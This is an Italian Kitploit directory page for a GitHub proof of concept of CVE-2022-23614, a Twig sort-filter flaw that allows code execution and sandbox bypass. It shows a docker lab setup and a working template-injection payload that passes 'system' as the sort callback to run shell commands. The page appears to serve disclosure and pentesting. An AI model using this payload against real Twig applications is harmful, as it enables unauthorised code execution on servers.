Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-23614 — PoC per CVE-2022-23614 (filtro sort di Twig: esecuzione di codice/bypass della sandbox) | Kitploit
Strumenti/GitHubGitHub/davwwwx/cve-2022-23614
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubdavwwwx/cve-2022-23614

CVE-2022-23614

PoC per CVE-2022-23614 (filtro sort di Twig: esecuzione di codice/bypass della sandbox)

Vedi Repository
424 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-23614

Prova di concetto per CVE-2022-23614, GHSA-5mv2-rx3q-4w2v (Esecuzione di codice / bypass sandbox del filtro sort di Twig)

Come si vede in questo commit - https://github.com/twigphp/Twig/commit/.., twig stava passando il nome di funzione fornito dall'utente come parametro callback a uasort (qui), portando quindi a esecuzione arbitraria di codice

Per costruire ed eseguire il container docker con una versione vulnerabile di twig

root@kitploit:~
$ ./build-docker.sh

Apri la pagina web su localhost:1337 e prova a renderizzare il seguente payload

root@kitploit:~
{{ ['id','']|sort('system') }}

PoC PoC

Risultato Result

Scarica lo strumento